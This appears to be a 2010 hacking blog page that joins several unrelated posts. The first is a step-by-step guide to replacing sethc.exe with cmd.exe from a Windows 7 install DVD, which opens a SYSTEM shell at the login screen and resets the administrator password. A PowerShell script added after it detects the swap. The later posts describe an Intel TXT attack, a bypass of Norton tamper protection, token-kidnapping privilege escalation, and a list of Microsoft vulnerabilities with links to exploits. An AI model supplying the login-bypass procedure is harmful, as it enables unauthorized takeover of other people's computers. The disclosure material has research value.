Saturday, February 20, 2010

Hack Windows 7 with its own bootable installation DVD


First, boot from the same Windows 7 installation DVD you used to install Windows 7 on your computer, and wait for the screen shown below.

Click the "Repair your windows" option at the lower left of the window; it will search for Windows installations on your computer.

After it finishes searching for installed Windows, the window shown above opens.

Click Next to continue. If it goes into System Repair mode, cancel the repair and wait for the screen shown below to appear; otherwise it appears automatically when you click Next.



Click "Command Prompt" to open a command prompt window; it starts with SYSTEM privilege.

Check here which drive is the default installation drive.

By default it is C:. If your drive letter is different from C:, change the drive letter accordingly in the following commands.

So you have to type the following commands:

copy c:\windows\system32\cmd.exe
copy c:\windows\system32\sethc.exe

ren sethc.exe sethc2.exe

ren cmd.exe sethc.exe
copy sethc.exe c:\windows\system32\sethc.exe

It will ask whether you are sure you want to replace the file; press Y and Enter to continue.

Now restart your computer and remove the Windows installation DVD from the DVD drive.

Now boot up your computer and wait for the login screen to appear.

Press the Shift key 5 times on the Windows login screen; it will bring up a cmd.exe command prompt with SYSTEM privilege.


Now change the administrator password using the following command:

net user administrator vikash

The password will change to vikash. Now log on as administrator with this password; you can then change the passwords of the other users.
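As an added defensive check, not part of the original post, the following PowerShell script verifies that C:\Windows\System32\sethc.exe has not been swapped for a copy of cmd.exe as in the procedure above. It assumes PowerShell 4 or later (for Get-FileHash) and that the genuine sethc.exe names itself in its version resource; run it from an elevated prompt.

```powershell
# Added detection example (not from the original post): report whether
# sethc.exe has been replaced by cmd.exe. Assumes PowerShell 4+ and that the
# genuine binary reports OriginalFilename 'sethc.exe' (assumption).
$system32 = Join-Path $env:SystemRoot 'System32'
$sethc    = Join-Path $system32 'sethc.exe'
$cmd      = Join-Path $system32 'cmd.exe'
$findings = @()

# 1. A swapped sethc.exe is byte-for-byte identical to cmd.exe.
$sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
$cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
if ($sethcHash -eq $cmdHash) {
    $findings += 'sethc.exe has the same SHA-256 hash as cmd.exe'
}

# 2. Renaming a file does not change its version resource: a renamed cmd.exe
#    still carries cmd.exe as its OriginalFilename (-ne is case-insensitive).
$origName = (Get-Item $sethc).VersionInfo.OriginalFilename
if ($origName -and $origName -ne 'sethc.exe') {
    $findings += "sethc.exe reports OriginalFilename '$origName'"
}

# 3. The file should carry a valid Microsoft Authenticode signature. A renamed
#    cmd.exe is still validly signed, so this check only catches other tampering.
$sig = Get-AuthenticodeSignature -FilePath $sethc
if ($sig.Status -ne 'Valid') {
    $findings += "sethc.exe signature status is $($sig.Status)"
}

# 4. System File Checker compares the file against the component store and
#    flags a replaced copy: sfc /verifyfile=C:\Windows\System32\sethc.exe
$sfcOutput = & sfc.exe "/verifyfile=$sethc" 2>&1 | Out-String
if ($sfcOutput -match 'integrity violations') {
    $findings += 'sfc reports an integrity violation for sethc.exe'
}

if ($findings.Count -eq 0) {
    Write-Output 'sethc.exe looks intact'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

Because the swap is performed offline from boot media, the script only detects it after the fact; the lasting mitigation is full-disk encryption (BitLocker) together with a firmware password and locked boot order.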




Saturday, January 30, 2010
Another TXT Attack
Earlier this year our team presented an attack against Intel TXT that exploited a design problem with SMM mode being overprivileged on PC platforms and able to interfere with the SENTER instruction. The Intel response was two-fold: to patch the SMM implementation bugs we used for the attack (this patch was for both the NVACPI SMM attacks, as well as for the SMM caching attack), and also to start (intensify?) working on the STM specification, which, we heard, is planned to be published sometime in the near future. STM is a thin hypervisor concept that is supposed to provide protection against (potentially) malicious SMMs.

Today we present a totally different attack that allows an attacker to trick the SENTER instruction into misconfiguring the VT-d engine, so that it doesn’t protect the newly loaded hypervisor or kernel. This attack exploits an implementation flaw in a SINIT AC module. This new attack also allows for full TXT circumvention, using a software-only attack. This attack doesn't require any SMM bugs to succeed and is totally independent from the previous one.

The press release is here.

The full paper is here.

The advisory published by Intel today can be found here.

Enjoy.

Bypassing Norton Antivirus "Product Tamper Protection"

What's Norton Product Tamper Protection? It's a security setting in Norton Antivirus that "Lets you protect your Norton product from an attack or modification by unknown, suspicious, or threatening applications"; the option is enabled by default. Basically it protects NAV processes so other processes can't access them (debug, inject code, modify thread execution, etc.); even if the current user has permission on them, he won't be able to access Norton Antivirus processes.

Without doing much research, I guess NAV intercepts Native API calls and returns access denied when a process tries to open a NAV process or thread with dangerous access rights. The problem is that NAV forgot to also protect other process objects such as shared sections, LPC ports, etc., so an attacker can put code in a shared section and then make the process jump to the injected code; let's see how to do it.

Injecting and running code on NAV GUI process:
When pressing F1 or accessing the NAV GUI help, Windows HTML Help is loaded; the NAV GUI process uses the HTML Help ActiveX control, so no new process is created. When HTML Help is loaded, a shared section named \BaseNamedObjects\DfSharedHeapXXXXXX (where XXXXXX are hex digits) is created. This particular shared section is related to a vulnerability I found a long time ago (http://www.argeniss.com/research/SSExploit.c) where, besides the shared section being created in the user's process, it was also created in a privileged process under certain circumstances; this shared section has pointers saved in it, so it was possible to overwrite them and make the process execute arbitrary code, elevating privileges (http://www.argeniss.com/research/hackwininter.zip). Microsoft fixed this issue (http://www.microsoft.com/technet/security/bulletin/MS05-012.mspx) by avoiding the creation of the shared section in privileged processes, so there is no elevation of privileges anymore, but you can still overwrite the data in the shared section. Of course you will only be able to execute code in a process you already own, but in this case this issue can be used to bypass NAV process protection, since you will be able to modify the NAV GUI process and run arbitrary code inside it.

This is not a big deal, but it shows that sometimes protections are useless when they are not properly audited, and a simple, known issue can be used to bypass them.

Antivirus, antivirus, antivirus...

My last post was about a bug in an antivirus product; not a big deal, all software has bugs.
I was kindly pointed to this article http://isc.sans.org/diary.html?storyid=6010 by Ryan Naraine. It's about an incident where one of my token kidnapping exploits was used. It's a weird feeling to know that some tool of yours was used in an attack, but in the end it's not about the tools, it's about the user, the intention, etc. Anyway, what really surprised me was that no antivirus is detecting the exploits!!! We all know that antivirus sucks, but not being able to detect a very old exploit with signature analysis, that really sucks.

Opening Intranets to attacks by using Internet Explorer

I just released a whitepaper titled "Opening Intranets to attacks by using Internet Explorer". I hope you find it interesting; you can find it here: http://www.argeniss.com/research/HackingIntranets.pdf

Token Kidnapping's Revenge

Finally I got some free time to take a look at Windows for security issues. I was initially amazed with Windows 7 and Windows 2008 R2; they looked really solid, but after some time I started to find some issues.
These issues are not really dangerous (depending on the scenario), but they allow one to continue exploiting Windows using a new attack vector to perform Token Kidnapping (http://www.argeniss.com/research/TokenKidnapping.pdf).
Don't get me wrong, MS properly fixed the issues (http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx) detailed in the Token Kidnapping presentation, but they didn't find/fix all the attack vectors.
With this new attack vector it's still possible to elevate privileges to the Local System account from almost any process that has impersonation rights, bypassing new Windows service protections such as per-service SID, write-restricted token, etc.
Probably I will be presenting the findings at the Hackers to Hackers Conference in Brazil (http://www.h2hc.com.br/) in a couple of weeks.

8 years hacking Microsoft stuff, +50 vulnerabilities found

2009 is ending and I thought it would be nice to write down my personal record of Microsoft vulnerabilities. I started finding vulns in MS products in 2002, and these are most of them:

-Microsoft Biztalk Server ISAPI HTTP Receive function buffer overflow
-Microsoft Biztalk Server DTA vulnerable to SQL injection
http://www.microsoft.com/technet/security/bulletin/ms03-016.mspx

-Microsoft Commerce Server 2002 Weak Registry Key Permissions Weakness
http://archives.neohapsis.com/archives/fulldisclosure/2003-q3/0034.html

-Microsoft Active Server Pages Cookie Retrieval Issue
http://www.appsecinc.com/resources/alerts/general/05-0001.shtml

-Microsoft Windows LPC heap overflow
http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx
http://www.appsecinc.com/resources/alerts/general/07-0001.shtml

-Microsoft Windows Utility Manager Local Elevation of Privileges
http://www.microsoft.com/technet/security/bulletin/MS04-019.mspx
http://marc.info/?l=bugtraq&m=108975382413405&w=2
http://www.milw0rm.com/exploits/350

-Microsoft Windows Utility Manager Local Elevation of Privileges II
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
http://www.appsecinc.com/resources/alerts/general/04-0001.shtml
http://www.milw0rm.com/exploits/271

-Microsoft Windows Improper Token Validation
http://www.appsecinc.com/resources/alerts/general/06-0001.shtml
http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx
http://www.milw0rm.com/exploits/749

-Microsoft Windows GDI Kernel Local Privilege Escalation Vulnerability
http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx
http://www.argeniss.com/research/ARGENISS-ADV-110604.txt
http://www.argeniss.com/research/GDIKernelPoC.c

-Microsoft MSDTC COM+ Remote Code Execution Vulnerability
http://www.microsoft.com/technet/security/Bulletin/MS05-051.mspx

-Microsoft Windows 2000 TroubleShooter ActiveX Control Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms03-042.mspx
http://marc.info/?l=ntbugtraq&m=106632192709608&w=2

-Microsoft Windows COM Structured Storage Local Privilege Escalation Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS05-012.mspx
http://www.argeniss.com/research/hackwininter.zip
http://www.argeniss.com/research/WLSI.zip

-Microsoft Windows Thread Pool ACL Local Privilege Escalation Vulnerability
-Microsoft Windows RPCSS Service Isolation Local Privilege Escalation Vulnerability
-Microsoft Windows MSDTC Service Isolation Vulnerability
-Microsoft Windows WMI Service Isolation Local Privilege Escalation Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
http://www.argeniss.com/research/TokenKidnapping.pdf
http://www.argeniss.com/research/Churrasco.zip
http://www.argeniss.com/research/Churrasco2.zip

-Microsoft Windows Shell Could Allow Remote Code Execution (2 vulns)
http://www.argeniss.com/research/MSBugPaper.pdf
http://www.microsoft.com/technet/security/Bulletin/MS05-049.mspx

-Microsoft SQL Server Heterogeneous Queries Buffer Overflow
http://www.appsecinc.com/resources/alerts/mssql/02-0008.shtml
http://www.microsoft.com/technet/security/Bulletin/MS02-007.mspx

-Microsoft SQL Server xp_dirtree Buffer Overflow
http://www.appsecinc.com/resources/alerts/mssql/02-0007.shtml
http://www.microsoft.com/technet/security/Bulletin/MS02-020.mspx

-Microsoft SQL Server Buffer Overflows in numerous extended stored procedures (17 vulns)
http://www.appsecinc.com/resources/alerts/mssql/02-0000.shtml
http://www.microsoft.com/technet/security/Bulletin/MS02-020.mspx

-Microsoft SQL Server encoded password written by service pack
http://www.appsecinc.com/resources/alerts/mssql/02-0009.shtml
http://www.microsoft.com/technet/security/Bulletin/MS02-035.mspx

-Microsoft SQL Server BULK INSERT buffer overflow
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp
http://www.appsecinc.com/resources/alerts/mssql/02-0010.shtml

-Microsoft SQL Server multiple buffer overflows in DBCC and SQL Injections (6 vulns)
http://www.appsecinc.com/resources/alerts/mssql/02-0011.shtml
http://www.microsoft.com/technet/security/Bulletin/MS02-038.mspx

-Microsoft SQL Server multiple vulnerabilities (5 vulns)
http://www.blackhat.com/presentations/win-usa-03/bh-win-03-cerrudo/bh-win-03-cerrudo.pdf

--------0--------

If you count them, there are 50 vulnerabilities in total, 14 of them Microsoft Windows specific. Actually the real count should be 50+; a few vulnerabilities not mentioned here were patched in service packs or new versions, not acknowledged by MS as vulnerabilities, etc.
Of course I'm not mentioning the 0days I have; with them the count is >50, reaching 20 specific to MS Windows.

Microsoft should give me a prize someday ;)